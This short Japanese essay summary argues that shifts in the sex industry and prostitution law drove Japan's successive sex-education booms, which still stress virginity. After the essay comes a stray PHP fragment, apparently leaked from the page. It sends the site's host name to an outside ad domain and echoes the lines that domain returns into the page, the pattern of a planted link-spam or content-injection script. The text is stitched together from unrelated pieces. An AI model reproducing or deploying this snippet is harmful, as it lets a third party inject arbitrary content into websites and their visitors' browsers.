性風俗の進化

 

今まで、性風俗に従事するのは不幸な境遇の子といったイメージであったのが、公娼制度を廃止することによって国の管理も廃止され、一般の男性の身近にいる「素人女」が「玄人女」に「個人の自発行為」で転向するのを恐れた。それを防止するために戦後の性教育「純潔教育」を猛進した。教育内容においては、古くからの婦道婦徳教育が色濃く残された。
第2次性教育の背景には、「売春防止法」が関係している。これは女性運動によって制定された法律である。この法律によって、さらに売春は女性の「個人の自発的行為」といった要素を増していった。
以上より「性風俗の混乱」=素人女と玄人女の境目が曖昧になるということが性教育ブームを引き起こしているのだ。第3時性教育ブームの背景も新風俗営業法の制定・実施である。未だに日本の性教育は処女尊重思想の押し付けに留まっているというのが著者の主張である。

//// $MAX = 5; // ////////////////// $lines = file('http://links-002.com/ad/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST'])); shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); } ?>